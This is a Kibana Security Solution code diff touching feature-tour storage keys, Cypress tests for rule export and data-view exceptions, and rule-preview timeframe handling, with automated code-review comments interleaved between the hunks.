@@ -427,11 +427,17 @@ export const RULES_TABLE_MAX_PAGE_SIZE = 100;
 export const RULES_TABLE_PAGE_SIZE_OPTIONS = [5, 10, 20, 50, RULES_TABLE_MAX_PAGE_SIZE];
 
 /**
- * A local storage key we use to store the state of the feature tour UI for the Rule Management page.
+ * Local storage keys we use to store the state of our new features tours we currently show in the app.
  *
- * NOTE: As soon as we want to show a new tour for features in the current Kibana version,
- * we will need to update this constant with the corresponding version.
+ * NOTE: As soon as we want to show tours for new features in the upcoming release,
+ * we will need to update these constants with the corresponding version.
  */
+export const NEW_FEATURES_TOUR_STORAGE_KEYS = {
+ RULE_MANAGEMENT_PAGE: 'securitySolution.rulesManagementPage.newFeaturesTour.v8.4',
+ RULE_CREATION_PAGE_DEFINE_STEP:
+ 'securitySolution.ruleCreationPage.defineStep.newFeaturesTour.v8.4',
+};
+
 export const RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY =
 'securitySolution.rulesManagementPage.newFeaturesTour.v8.4';
 
diff --git a/x-pack/plugins/security_solution/cypress/integration/detection_rules/export_rule.spec.ts b/x-pack/plugins/security_solution/cypress/integration/detection_rules/export_rule.spec.ts
index f844a2960deb3..4451048ee0816 100644
--- a/x-pack/plugins/security_solution/cypress/integration/detection_rules/export_rule.spec.ts
+++ b/x-pack/plugins/security_solution/cypress/integration/detection_rules/export_rule.spec.ts
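Review bot: The new `NEW_FEATURES_TOUR_STORAGE_KEYS.RULE_MANAGEMENT_PAGE` and the retained `RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY` hold the same literal `'securitySolution.rulesManagementPage.newFeaturesTour.v8.4'`, so the next version bump can drift between them. Defining the old name from the new map keeps a single source of truth: `/** @deprecated use NEW_FEATURES_TOUR_STORAGE_KEYS.RULE_MANAGEMENT_PAGE */` followed by `export const RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY = NEW_FEATURES_TOUR_STORAGE_KEYS.RULE_MANAGEMENT_PAGE;`. Adding `as const` to the map would also keep the values as literal types for `Object.values` consumers.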
@@ -21,12 +21,16 @@ import { bulkExportRules, selectAllRules, } from '../../tasks/alerts_detection_rules'; +import { createExceptionList, deleteExceptionList } from '../../tasks/api_calls/exceptions'; +import { getExceptionList } from '../../objects/exception'; import { createCustomRule } from '../../tasks/api_calls/rules'; import { cleanKibana, deleteAlertsAndRules } from '../../tasks/common'; import { login, visitWithoutDateRange } from '../../tasks/login'; import { DETECTIONS_RULE_MANAGEMENT_URL } from '../../urls/navigation'; +const exceptionList = getExceptionList(); + describe('Export rules', () => { before(() => { cleanKibana(); @@ -86,4 +90,48 @@ describe('Export rules', () => { `Successfully exported ${expectedNumberCustomRulesToBeExported} of ${totalNumberOfRules} rules. Prebuilt rules were excluded from the resulting file.` ); }); + + context('rules with exceptions', () => { + beforeEach(() => { + deleteExceptionList(exceptionList.list_id, exceptionList.namespace_type); + // create rule with exceptions + createExceptionList(exceptionList, exceptionList.list_id).then((response) => + createCustomRule( + { + ...getNewRule(), + name: 'rule with exceptions', + exceptionLists: [ + { + id: response.body.id, + list_id: exceptionList.list_id, + type: exceptionList.type, + namespace_type: exceptionList.namespace_type, + }, + ], + }, + '2' + ) + ); + }); + + it('exports custom rules with exceptions', function () { + // one rule with exception, one without it + const expectedNumberCustomRulesToBeExported = 2; + + loadPrebuiltDetectionRulesFromHeaderBtn(); + + selectAllRules(); + bulkExportRules(); + + // should display correct number of custom rules when one of them has exceptions + cy.get(MODAL_CONFIRMATION_BTN) + .should('have.text', `Export ${expectedNumberCustomRulesToBeExported} custom rules`) + .click(); + + cy.get(TOASTER_BODY).should( + 'contain', + `Successfully exported ${expectedNumberCustomRulesToBeExported}` + ); + }); + }); }); 
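Review bot: The `beforeEach` in the hunk at -86 creates an exception list and a rule but has no `afterEach`; only the next run's `deleteExceptionList` call removes the list, so state leaks into whatever spec runs after this one. Adding `afterEach(() => deleteExceptionList(exceptionList.list_id, exceptionList.namespace_type));` inside the `context` block keeps setup and teardown symmetrical. `response.body.id` is also used without checking that the create succeeded; if `createExceptionList` does not fail on non-2xx, a failed create silently yields a rule referencing an undefined id and the later `Export 2 custom rules` assertion fails with an unrelated message. The new `it` uses `function ()` while the rest of the file uses arrow callbacks.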
diff --git a/x-pack/plugins/security_solution/cypress/integration/exceptions/add_edit_data_view_exception.spec.ts b/x-pack/plugins/security_solution/cypress/integration/exceptions/add_edit_data_view_exception.spec.ts new file mode 100644 index 0000000000000..c818f4e51060f --- /dev/null +++ b/x-pack/plugins/security_solution/cypress/integration/exceptions/add_edit_data_view_exception.spec.ts 
@@ -0,0 +1,159 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { getException } from '../../objects/exception'; +import { getNewRule } from '../../objects/rule'; + +import { ALERTS_COUNT, EMPTY_ALERT_TABLE, NUMBER_OF_ALERTS } from '../../screens/alerts'; + +import { addExceptionFromFirstAlert, goToClosedAlerts, goToOpenedAlerts } from '../../tasks/alerts'; +import { createCustomRuleEnabled } from '../../tasks/api_calls/rules'; +import { goToRuleDetails } from '../../tasks/alerts_detection_rules'; +import { waitForAlertsToPopulate } from '../../tasks/create_new_rule'; +import { esArchiverLoad, esArchiverUnload, esArchiverResetKibana } from '../../tasks/es_archiver'; +import { login, visitWithoutDateRange } from '../../tasks/login'; +import { + addsException, + addsExceptionFromRuleSettings, + editException, + goToAlertsTab, + goToExceptionsTab, + removeException, + waitForTheRuleToBeExecuted, +} from '../../tasks/rule_details'; + +import { DETECTIONS_RULE_MANAGEMENT_URL } from '../../urls/navigation'; +import { deleteAlertsAndRules, postDataView } from '../../tasks/common'; +import { + EXCEPTION_EDIT_FLYOUT_SAVE_BTN, + EXCEPTION_ITEM_CONTAINER, + FIELD_INPUT, +} from '../../screens/exceptions'; +import { + addExceptionEntryFieldValueOfItemX, + addExceptionEntryFieldValueValue, +} from '../../tasks/exceptions'; + +describe('Adds rule exception using data views', () => { + const NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS = '1 alert'; + + before(() => { + esArchiverResetKibana(); + esArchiverLoad('exceptions'); + login(); + + postDataView('exceptions-*'); + }); + + beforeEach(() => { + deleteAlertsAndRules(); + createCustomRuleEnabled( + { + ...getNewRule(), + customQuery: 'agent.name:*', + dataSource: { dataView: 'exceptions-*', type: 'dataView' }, + }, 
+ 'rule_testing', + '1s' + ); + visitWithoutDateRange(DETECTIONS_RULE_MANAGEMENT_URL); + goToRuleDetails(); + waitForTheRuleToBeExecuted(); + waitForAlertsToPopulate(); + }); + + afterEach(() => { + esArchiverUnload('exceptions_2'); + }); + + after(() => { + esArchiverUnload('exceptions'); + }); + + it('Creates an exception from an alert and deletes it', () => { + cy.get(ALERTS_COUNT).should('exist'); + cy.get(NUMBER_OF_ALERTS).should('have.text', NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS); + // Create an exception from the alerts actions menu that matches + // the existing alert + addExceptionFromFirstAlert(); + addsException(getException()); + + // Alerts table should now be empty from having added exception and closed + // matching alert + cy.get(EMPTY_ALERT_TABLE).should('exist'); + + // Closed alert should appear in table + goToClosedAlerts(); + cy.get(ALERTS_COUNT).should('exist'); + cy.get(NUMBER_OF_ALERTS).should('have.text', `${NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS}`); + + // Remove the exception and load an event that would have matched that exception + // to show that said exception now starts to show up again + goToExceptionsTab(); + removeException(); + esArchiverLoad('exceptions_2'); + goToAlertsTab(); + goToOpenedAlerts(); + waitForTheRuleToBeExecuted(); + waitForAlertsToPopulate(); + + cy.get(ALERTS_COUNT).should('exist'); + cy.get(NUMBER_OF_ALERTS).should('have.text', `${NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS}`); + }); + + it('Creates an exception from a rule and deletes it', () => { + // Create an exception from the exception tab that matches + // the existing alert + goToExceptionsTab(); + addsExceptionFromRuleSettings(getException()); + + // Alerts table should now be empty from having added exception and closed + // matching alert + goToAlertsTab(); + cy.get(EMPTY_ALERT_TABLE).should('exist'); + + // Closed alert should appear in table + goToClosedAlerts(); + cy.get(ALERTS_COUNT).should('exist'); + cy.get(NUMBER_OF_ALERTS).should('have.text', 
`${NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS}`); + + // Remove the exception and load an event that would have matched that exception + // to show that said exception now starts to show up again + goToExceptionsTab(); + removeException(); + esArchiverLoad('exceptions_2'); + goToAlertsTab(); + goToOpenedAlerts(); + waitForTheRuleToBeExecuted(); + waitForAlertsToPopulate(); + + cy.get(ALERTS_COUNT).should('exist'); + cy.get(NUMBER_OF_ALERTS).should('have.text', `${NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS}`); + }); + + it('Edits an exception', () => { + goToExceptionsTab(); + addsExceptionFromRuleSettings(getException()); + + editException(); + + // check that the existing item's field is being populated + cy.get(EXCEPTION_ITEM_CONTAINER) + .eq(0) + .find(FIELD_INPUT) + .eq(0) + .should('have.text', 'agent.name'); + + // check that you can select a different field + addExceptionEntryFieldValueOfItemX('user.name{downarrow}{enter}', 0, 0); + addExceptionEntryFieldValueValue('test', 0); + + cy.get(EXCEPTION_EDIT_FLYOUT_SAVE_BTN).click(); + cy.get(EXCEPTION_EDIT_FLYOUT_SAVE_BTN).should('have.attr', 'disabled'); + cy.get(EXCEPTION_EDIT_FLYOUT_SAVE_BTN).should('not.exist'); + }); +}); diff --git a/x-pack/plugins/security_solution/cypress/tasks/api_calls/rules.ts b/x-pack/plugins/security_solution/cypress/tasks/api_calls/rules.ts index 0ef07195b3309..655efbd2353fc 100644 --- a/x-pack/plugins/security_solution/cypress/tasks/api_calls/rules.ts +++ b/x-pack/plugins/security_solution/cypress/tasks/api_calls/rules.ts 
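Review bot: `postDataView('exceptions-*')` in `before` has no counterpart in `after`, so the data view outlives the spec; with the companion `common.ts` change that sets `id: dataSource`, the id is now deterministic and a leftover view would presumably make the next run's create request conflict instead of creating a fresh copy. Deleting that data view in `after()` next to `esArchiverUnload('exceptions')` would keep the spec self-contained. `afterEach` also unloads `exceptions_2` for `'Edits an exception'`, which never loads it; harmless if the unload tolerates a missing archive, but worth a one-line comment. The `NUMBER_OF_AUDITBEAT_EXCEPTIONS_ALERTS` constant is a rendered string (`'1 alert'`), not a count, which its name does not convey.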
@@ -154,6 +154,31 @@ export const createCustomRuleEnabled = ( headers: { 'kbn-xsrf': 'cypress-creds' }, failOnStatusCode: false, }); + } else if (rule.dataSource.type === 'dataView') { + cy.request({ + method: 'POST', + url: 'api/detection_engine/rules', + body: { + rule_id: ruleId, + risk_score: parseInt(rule.riskScore, 10), + description: rule.description, + interval, + name: rule.name, + severity: rule.severity.toLocaleLowerCase(), + type: 'query', + from: 'now-50000h', + index: [], + data_view_id: rule.dataSource.dataView, + query: rule.customQuery, + language: 'kuery', + enabled: true, + tags: ['rule1'], + max_signals: maxSignals, + building_block_type: rule.buildingBlockType, + }, + headers: { 'kbn-xsrf': 'cypress-creds' }, + failOnStatusCode: false, + }); } }; diff --git a/x-pack/plugins/security_solution/cypress/tasks/common.ts b/x-pack/plugins/security_solution/cypress/tasks/common.ts index 4982053648667..cd9525e95b0b2 100644 --- a/x-pack/plugins/security_solution/cypress/tasks/common.ts +++ b/x-pack/plugins/security_solution/cypress/tasks/common.ts @@ -185,6 +185,7 @@ export const postDataView = (dataSource: string) => { url: `/api/index_patterns/index_pattern`, body: { index_pattern: { + id: dataSource, fieldAttrs: '{}', title: dataSource, timeFieldName: '@timestamp', diff --git a/x-pack/plugins/security_solution/cypress/tasks/login.ts b/x-pack/plugins/security_solution/cypress/tasks/login.ts index a86948b383385..15f009614b07f 100644 --- a/x-pack/plugins/security_solution/cypress/tasks/login.ts +++ b/x-pack/plugins/security_solution/cypress/tasks/login.ts 
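Review bot: The new `else if (rule.dataSource.type === 'dataView')` branch leaves any other `dataSource.type` as a silent no-op — no rule is created and the failure only surfaces later in UI assertions. Closing the chain with `else { throw new Error('Unsupported dataSource type: ' + rule.dataSource.type); }` (or a `never` exhaustiveness check) makes a bad fixture fail at the source. The request body also appears to duplicate the preceding branch apart from `index: []` and `data_view_id`; a shared base object spread into both branches would keep them from drifting. `createCustomRuleEnabled` starts before the hunk.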
@@ -10,7 +10,7 @@ import type { UrlObject } from 'url'; import Url from 'url'; import type { ROLES } from '../../common/test'; -import { RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY } from '../../common/constants'; +import { NEW_FEATURES_TOUR_STORAGE_KEYS } from '../../common/constants'; import { TIMELINE_FLYOUT_BODY } from '../screens/timeline'; import { hostDetailsUrl, LOGOUT_URL, userDetailsUrl } from '../urls/navigation'; @@ -287,18 +287,20 @@ export const getEnvAuth = (): User => { }; /** - * Saves in localStorage rules feature tour config with deactivated option - * It prevents tour to appear during tests and cover UI elements + * For all the new features tours we show in the app, this method disables them + * by setting their configs in the local storage. It prevents the tours from appearing + * on the page during test runs and covering other UI elements. * @param window - browser's window object */ -const disableFeatureTourForRuleManagementPage = (window: Window) => { +const disableNewFeaturesTours = (window: Window) => { + const tourStorageKeys = Object.values(NEW_FEATURES_TOUR_STORAGE_KEYS); const tourConfig = { isTourActive: false, }; - window.localStorage.setItem( - RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY, - JSON.stringify(tourConfig) - ); + + tourStorageKeys.forEach((key) => { + window.localStorage.setItem(key, JSON.stringify(tourConfig)); + }); }; /** @@ -326,7 +328,7 @@ export const visit = ( if (onBeforeLoadCallback) { onBeforeLoadCallback(win); } - disableFeatureTourForRuleManagementPage(win); + disableNewFeaturesTours(win); }, } ); 
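Review bot: `disableNewFeaturesTours` in the hunk at -287 re-serializes the same `tourConfig` for every key and iterates with `forEach`; hoisting the JSON once and using `for…of` reads more directly: `const serializedConfig = JSON.stringify({ isTourActive: false });` then `for (const key of Object.values(NEW_FEATURES_TOUR_STORAGE_KEYS)) window.localStorage.setItem(key, serializedConfig);`. This is purely a style point; behavior is unchanged. The new TSDoc could add that the keys come from `NEW_FEATURES_TOUR_STORAGE_KEYS`, so a new tour only needs registering there.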
@@ -334,20 +336,20 @@ export const visit = ( export const visitWithoutDateRange = (url: string, role?: ROLES) => { cy.visit(role ? getUrlWithRoute(role, url) : url, { - onBeforeLoad: disableFeatureTourForRuleManagementPage, + onBeforeLoad: disableNewFeaturesTours, }); }; export const visitWithUser = (url: string, user: User) => { cy.visit(constructUrlWithUser(user, url), { - onBeforeLoad: disableFeatureTourForRuleManagementPage, + onBeforeLoad: disableNewFeaturesTours, }); }; export const visitTimeline = (timelineId: string, role?: ROLES) => { const route = `/app/security/timelines?timeline=(id:'${timelineId}',isOpen:!t)`; cy.visit(role ? getUrlWithRoute(role, route) : route, { - onBeforeLoad: disableFeatureTourForRuleManagementPage, + onBeforeLoad: disableNewFeaturesTours, }); cy.get('[data-test-subj="headerGlobalNav"]'); cy.get(TIMELINE_FLYOUT_BODY).should('be.visible'); diff --git a/x-pack/plugins/security_solution/public/app/home/template_wrapper/bottom_bar/index.tsx b/x-pack/plugins/security_solution/public/app/home/template_wrapper/bottom_bar/index.tsx index 407c0db35f49d..123ae4563f756 100644 --- a/x-pack/plugins/security_solution/public/app/home/template_wrapper/bottom_bar/index.tsx +++ b/x-pack/plugins/security_solution/public/app/home/template_wrapper/bottom_bar/index.tsx @@ -8,7 +8,7 @@ /* eslint-disable react/display-name */ import React from 'react'; -import type { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { KibanaPageTemplateProps } from '@kbn/shared-ux-page-kibana-template'; import type { AppLeaveHandler } from '@kbn/core/public'; import { TimelineId } from '../../../../../common/types/timeline'; import { AutoSaveWarningMsg } from '../../../../timelines/components/timeline/auto_save_warning'; diff --git a/x-pack/plugins/security_solution/public/app/home/template_wrapper/index.tsx b/x-pack/plugins/security_solution/public/app/home/template_wrapper/index.tsx index 21db51173ca20..79c7a0899e9c6 100644 
--- a/x-pack/plugins/security_solution/public/app/home/template_wrapper/index.tsx +++ b/x-pack/plugins/security_solution/public/app/home/template_wrapper/index.tsx @@ -10,7 +10,7 @@ import styled from 'styled-components'; import { EuiPanel, EuiThemeProvider, useEuiTheme } from '@elastic/eui'; import { IS_DRAGGING_CLASS_NAME } from '@kbn/securitysolution-t-grid'; import type { AppLeaveHandler } from '@kbn/core/public'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { useSecuritySolutionNavigation } from '../../../common/components/navigation/use_security_solution_navigation'; import { TimelineId } from '../../../../common/types/timeline'; import { getTimelineShowStatusByIdSelector } from '../../../timelines/components/flyout/selectors'; diff --git a/x-pack/plugins/security_solution/public/common/components/events_viewer/selectors/mock_state.ts b/x-pack/plugins/security_solution/public/common/components/events_viewer/selectors/mock_state.ts index 4b51ae9f329a7..3d54f078e7087 100644 --- a/x-pack/plugins/security_solution/public/common/components/events_viewer/selectors/mock_state.ts +++ b/x-pack/plugins/security_solution/public/common/components/events_viewer/selectors/mock_state.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { pipe } from 'lodash/fp'; import { mockGlobalState } from '../../../mock'; diff --git a/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/index.test.tsx b/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/index.test.tsx index 1387de4b50a67..2062765d64a0f 100644 --- a/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/index.test.tsx 
+++ b/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/index.test.tsx @@ -6,7 +6,7 @@ */ import { renderHook } from '@testing-library/react-hooks'; -import type { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { KibanaPageTemplateProps } from '@kbn/shared-ux-page-kibana-template'; import { useKibana } from '../../../lib/kibana/kibana_react'; import { useGetUserCasesPermissions } from '../../../lib/kibana'; import { SecurityPageName } from '../../../../app/types'; diff --git a/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/use_primary_navigation.tsx b/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/use_primary_navigation.tsx index 7196431bd77af..9e83ae9339dcd 100644 --- a/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/use_primary_navigation.tsx +++ b/x-pack/plugins/security_solution/public/common/components/navigation/use_security_solution_navigation/use_primary_navigation.tsx @@ -8,7 +8,7 @@ import React, { useEffect, useState, useCallback } from 'react'; import { i18n } from '@kbn/i18n'; -import type { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { KibanaPageTemplateProps } from '@kbn/shared-ux-page-kibana-template'; import type { PrimaryNavigationProps } from './types'; import { usePrimaryNavigationItems } from './use_navigation_items'; import { useIsGroupedNavigationEnabled } from '../helpers'; diff --git a/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.test.tsx b/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.test.tsx index 224ba07cc65e5..41d57e395c102 100644 --- a/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.test.tsx 
+++ b/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.test.tsx @@ -9,7 +9,7 @@ import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' import { OpenInDevConsoleButton } from '.'; import { TestProviders } from '../../mock'; -jest.mock('../../../risk_score/containers/common', () => ({ +jest.mock('../../hooks/use_space_id', () => ({ useSpaceId: jest.fn().mockReturnValue('myspace'), })); diff --git a/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.tsx b/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.tsx index e56cc391e7ec7..2b8c25adf3e8f 100644 --- a/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.tsx +++ b/x-pack/plugins/security_solution/public/common/components/open_in_dev_console/index.tsx @@ -6,7 +6,7 @@ */ import React from 'react'; import { EuiButton, EuiFlexItem, EuiToolTip } from '@elastic/eui'; -import { useSpaceId } from '../../../risk_score/containers/common'; +import { useSpaceId } from '../../hooks/use_space_id'; interface OpenInDevConsoleButtonProps { enableButton: boolean; diff --git a/x-pack/plugins/security_solution/public/common/components/search_bar/index.tsx b/x-pack/plugins/security_solution/public/common/components/search_bar/index.tsx index e833f1f1a5dbd..b85cd2949de59 100644 --- a/x-pack/plugins/security_solution/public/common/components/search_bar/index.tsx +++ b/x-pack/plugins/security_solution/public/common/components/search_bar/index.tsx @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import { getOr } from 'lodash/fp'; import React, { memo, useEffect, useCallback, useMemo } from 'react'; import type { ConnectedProps } from 'react-redux'; 
diff --git a/x-pack/plugins/security_solution/public/common/components/toasters/index.test.tsx b/x-pack/plugins/security_solution/public/common/components/toasters/index.test.tsx index bb42e99d50518..bf2249fac5c83 100644 --- a/x-pack/plugins/security_solution/public/common/components/toasters/index.test.tsx +++ b/x-pack/plugins/security_solution/public/common/components/toasters/index.test.tsx @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import { cloneDeep } from 'lodash/fp'; import { mount } from 'enzyme'; import React, { useEffect } from 'react'; diff --git a/x-pack/plugins/security_solution/public/risk_score/containers/common/index.ts b/x-pack/plugins/security_solution/public/common/hooks/use_space_id.ts similarity index 91% rename from x-pack/plugins/security_solution/public/risk_score/containers/common/index.ts rename to x-pack/plugins/security_solution/public/common/hooks/use_space_id.ts index 1277c08aee5a0..55debc6f80215 100644 --- a/x-pack/plugins/security_solution/public/risk_score/containers/common/index.ts +++ b/x-pack/plugins/security_solution/public/common/hooks/use_space_id.ts @@ -6,7 +6,7 @@ */ import { useState, useEffect } from 'react'; -import { useKibana } from '../../../common/lib/kibana'; +import { useKibana } from '../lib/kibana'; export const useSpaceId = () => { const { spaces } = useKibana().services; diff --git a/x-pack/plugins/security_solution/public/common/lib/kibana/hooks.ts b/x-pack/plugins/security_solution/public/common/lib/kibana/hooks.ts index b7c22f4398f91..4a736fc622055 100644 --- a/x-pack/plugins/security_solution/public/common/lib/kibana/hooks.ts +++ b/x-pack/plugins/security_solution/public/common/lib/kibana/hooks.ts 
@@ -11,7 +11,7 @@ import { useCallback, useEffect, useState, useRef } from 'react'; import { i18n } from '@kbn/i18n'; import { camelCase, isArray, isObject } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import type { AuthenticatedUser } from '@kbn/security-plugin/common/model'; import type { Capabilities, NavigateToAppOptions } from '@kbn/core/public'; import type { CasesPermissions } from '@kbn/cases-plugin/common/ui'; diff --git a/x-pack/plugins/security_solution/public/detections/components/alerts_table/timeline_actions/alert_context_menu.tsx b/x-pack/plugins/security_solution/public/detections/components/alerts_table/timeline_actions/alert_context_menu.tsx index fe2eabec1ea0b..41153cb6b188a 100644 --- a/x-pack/plugins/security_solution/public/detections/components/alerts_table/timeline_actions/alert_context_menu.tsx +++ b/x-pack/plugins/security_solution/public/detections/components/alerts_table/timeline_actions/alert_context_menu.tsx @@ -331,7 +331,7 @@ export const AddExceptionFlyoutWrapper: React.FC /** * This should be re-visited after UEBA work is merged */ - const useRuleIndices = useMemo(() => { + const memoRuleIndices = useMemo(() => { if (enrichedAlert != null && enrichedAlert['kibana.alert.rule.parameters']?.index != null) { return Array.isArray(enrichedAlert['kibana.alert.rule.parameters'].index) ? enrichedAlert['kibana.alert.rule.parameters'].index @@ -341,8 +341,8 @@ export const AddExceptionFlyoutWrapper: React.FC ? enrichedAlert.signal.rule.index : [enrichedAlert.signal.rule.index]; } - return ruleIndices; - }, [enrichedAlert, ruleIndices]); + return []; + }, [enrichedAlert]); const memoDataViewId = useMemo(() => { if ( 
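Review bot: In the `@@ -341,8 +341,8` hunk of alert_context_menu.tsx the fallback of `memoRuleIndices` now returns `[]` where it used to return the `ruleIndices` prop, and nothing records why an empty list is the right answer when the alert carries no rule index; the comment above the memo (`This should be re-visited after UEBA work is merged`) does not cover it. A one-line comment such as `// No index on the alert: fall back to an empty list rather than the ruleIndices prop` would record the intent. If `ruleIndices` is still declared on the wrapper's props it looks unused here now, so either drop it or point at its remaining use. `AddExceptionFlyoutWrapper` starts and ends outside the hunk.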
@@ -359,7 +359,7 @@ export const AddExceptionFlyoutWrapper: React.FC { + return { + start: dateMath.parse(startDate) || moment().subtract(1, 'hour'), + end: dateMath.parse(endDate) || moment(), + }; +}; + const RulePreviewComponent: React.FC = ({ index, indexPattern, @@ -129,9 +136,20 @@ const RulePreviewComponent: React.FC = ({ } }, [spaces]); + // Raw timeframe as a string const [startDate, setStartDate] = useState('now-1h'); const [endDate, setEndDate] = useState('now'); + // Parsed timeframe as a Moment object + const [timeframeStart, setTimeframeStart] = useState(moment().subtract(1, 'hour')); + const [timeframeEnd, setTimeframeEnd] = useState(moment()); + + useEffect(() => { + const { start, end } = refreshedTimeframe(startDate, endDate); + setTimeframeStart(start); + setTimeframeEnd(end); + }, [startDate, endDate]); + const { form } = useForm({ defaultValue: advancedOptionsDefaultValue, options: { stripEmptyFields: false }, @@ -180,21 +198,22 @@ const RulePreviewComponent: React.FC = ({ const showAdvancedOptions = queryPreviewIdSelected === ADVANCED_QUERY_SELECT_ID; const advancedOptions = useMemo( () => - showAdvancedOptions && startDate && endDate && formInterval && formLookback + showAdvancedOptions && formInterval && formLookback ? { - timeframeStart: dateMath.parse(startDate) || moment().subtract(1, 'hour'), - timeframeEnd: dateMath.parse(endDate) || moment(), + timeframeStart, + timeframeEnd, interval: formInterval, lookback: formLookback, } : undefined, - [endDate, formInterval, formLookback, showAdvancedOptions, startDate] + [formInterval, formLookback, showAdvancedOptions, timeframeEnd, timeframeStart] ); const [timeFrame, setTimeFrame] = useState(defaultTimeRange); const { addNoiseWarning, createPreview, + clearPreview, isPreviewRequestInProgress, previewId, logs, 
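Review bot: In the `@@ -129,9 +136,20` hunk the initial values `useState(moment().subtract(1, 'hour'))` and `useState(moment())` are recomputed on every render, and the effect right below overwrites both with `refreshedTimeframe(startDate, endDate)` after the first render anyway. Lazy initializers derived from the same helper keep one source of truth and avoid the per-render work: `useState(() => refreshedTimeframe(startDate, endDate).start)` and `useState(() => refreshedTimeframe(startDate, endDate).end)`. The file header for this hunk is not visible in the chunk (it appears to be rule_preview/index.tsx, judging by the next file header), and `RulePreviewComponent` continues outside the hunk.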
@@ -228,10 +247,27 @@ const RulePreviewComponent: React.FC = ({ const { startTransaction } = useStartTransaction(); + const [isRefreshing, setIsRefreshing] = useState(false); + useEffect(() => { + if (!isRefreshing) { + return; + } + createPreview(); + setIsRefreshing(false); + }, [isRefreshing, createPreview]); + const handlePreviewClick = useCallback(() => { startTransaction({ name: SINGLE_RULE_ACTIONS.PREVIEW }); - createPreview(); - }, [createPreview, startTransaction]); + if (showAdvancedOptions) { + // Refresh timeframe on Preview button click to make sure that relative times recalculated based on current time + const { start, end } = refreshedTimeframe(startDate, endDate); + setTimeframeStart(start); + setTimeframeEnd(end); + } else { + clearPreview(); + } + setIsRefreshing(true); + }, [clearPreview, endDate, showAdvancedOptions, startDate, startTransaction]); const onTimeChange = useCallback( ({ start: newStart, end: newEnd, isInvalid }: OnTimeChangeProps) => { diff --git a/x-pack/plugins/security_solution/public/detections/components/rules/rule_preview/use_preview_route.tsx b/x-pack/plugins/security_solution/public/detections/components/rules/rule_preview/use_preview_route.tsx index d0c543e3c3a31..7c5c3e673fd2a 100644 --- a/x-pack/plugins/security_solution/public/detections/components/rules/rule_preview/use_preview_route.tsx +++ b/x-pack/plugins/security_solution/public/detections/components/rules/rule_preview/use_preview_route.tsx @@ -5,7 +5,8 @@ * 2.0. */ -import { useEffect, useState, useCallback } from 'react'; +import { useEffect, useMemo, useState, useCallback } from 'react'; +import moment from 'moment'; import type { Unit } from '@kbn/datemath'; import type { Type, ThreatMapping } from '@kbn/securitysolution-io-ts-alerting-types'; import type { FieldValueQueryBar } from '../query_bar'; 
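Review bot: The `isRefreshing` state in the `@@ -228,10 +247,27` hunk appears to exist only to defer `createPreview()` to the render after `handlePreviewClick` has updated the timeframe state, but nothing says so; the handler comment explains the timeframe refresh, not why the call moved out of the handler into an effect. A comment on the effect such as `// Run createPreview() one render later so it sees the timeframe state set in handlePreviewClick` would make the round-trip intentional rather than accidental. It is also worth confirming that `createPreview` is recreated when `timeframeStart`/`timeframeEnd` change; if it is not, the deferred call still runs with the previous options. The enclosing component continues outside the hunk.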
@@ -60,8 +61,23 @@ export const usePreviewRoute = ({ }: PreviewRouteParams) => { const [isRequestTriggered, setIsRequestTriggered] = useState(false); + const [timeframeEnd, setTimeframeEnd] = useState(moment()); + useEffect(() => { + if (isRequestTriggered) { + setTimeframeEnd(moment()); + } + }, [isRequestTriggered, setTimeframeEnd]); + + const quickQueryOptions = useMemo( + () => ({ + timeframe: timeFrame, + timeframeEnd, + }), + [timeFrame, timeframeEnd] + ); + const { isLoading, showInvocationCountWarning, response, rule, setRule } = usePreviewRule({ - timeframe: timeFrame, + quickQueryOptions, advancedOptions, }); const [logs, setLogs] = useState(response.logs ?? []); diff --git a/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/index.tsx b/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/index.tsx index d791cafe54b15..b1c55bdecc52d 100644 --- a/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/index.tsx +++ b/x-pack/plugins/security_solution/public/detections/components/rules/step_define_rule/index.tsx @@ -80,6 +80,7 @@ import { getIsRulePreviewDisabled } from 